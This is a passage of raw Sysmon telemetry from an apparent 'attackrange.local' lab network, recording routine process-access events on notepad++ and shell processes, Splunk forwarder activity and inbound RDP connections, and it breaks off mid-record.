09:22:49.514{5EBD8912-8D2A-6151-9600-00000000FD01}46324792C:\Windows\Explorer.EXE{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+17e4d|C:\Windows\System32\SHELL32.dll+61dd0|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056494Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.514{5EBD8912-8D2A-6151-9600-00000000FD01}46324792C:\Windows\Explorer.EXE{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056493Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.514{5EBD8912-8D2A-6151-9600-00000000FD01}46323140C:\Windows\Explorer.EXE{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+17e4d|C:\Windows\System32\SHELL32.dll+61dd0|C:\Windows\System32\SHELL32.dll+11d44|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056492Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.514{5EBD8912-8D2A-6151-9600-00000000FD01}46323140C:\Windows\Explorer.EXE{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+11d44|C:\Windows\Explorer.EXE+1e118|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056491Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.514{5EBD8912-8D2A-6151-9600-00000000FD01}46323140C:\Windows\Explorer.EXE{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+17e4d|C:\Windows\System32\SHELL32.dll+61dd0|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056490Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.514{5EBD8912-8D2A-6151-9600-00000000FD01}46323140C:\Windows\Explorer.EXE{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056489Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.514{5EBD8912-8D2A-6151-9600-00000000FD01}46323140C:\Windows\Explorer.EXE{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000981095Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:45.896{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59528-false10.0.1.12-8000- 354300x8000000000000000981094Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:45.474{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51615-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981093Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:49.399{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E4A3661864A3DB6880E75887DAD4BEB4,SHA256=5BC154D6D3C4E990A59667CCED4EAF27D6FC39D4B357CD7883A40CA299CECBFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981092Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:49.336{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B151EC4CB08D40AB88F5489C495710F,SHA256=EAAB6D3B8F8BE5EB8CD93E00422017E6A23658781E63DF36B6847649CB5074AA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056488Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.273{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de49782-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001056487Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:48.065{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54225-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001056486Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:47.171{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63740-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001056485Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.280{5EBD8912-8D29-6151-8F00-00000000FD01}42404312C:\Windows\system32\taskhostw.exe{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056484Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.280{5EBD8912-8D29-6151-8F00-00000000FD01}42404312C:\Windows\system32\taskhostw.exe{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056483Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.280{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+17e4d|C:\Windows\System32\SHELL32.dll+61dd0|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056482Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.280{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056481Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.280{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056480Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.155{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056479Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.139{5EBD8912-8CC0-6151-1600-00000000FD01}12961784C:\Windows\system32\svchost.exe{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056478Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.139{5EBD8912-8CC0-6151-1600-00000000FD01}12961336C:\Windows\system32\svchost.exe{5EBD8912-8D68-6151-AC00-00000000FD01}5236C:\Program Files\Notepad++\notepad++.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056477Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.139{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056476Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.139{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056475Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.139{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056474Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.139{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056473Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.139{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056472Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.139{5EBD8912-8D29-6151-8D00-00000000FD01}41364420C:\Windows\system32\sihost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001056471Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.092{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93BC57834BD21E3CE5FB639682F8BCA2,SHA256=529F1963EBE807555109A91A6D1DA9DB311809F4E20DDDC10BF8ECC4A8742F08,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056470Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.092{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056469Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:49.092{5EBD8912-8CD0-6151-2C00-00000000FD01}24245224C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPC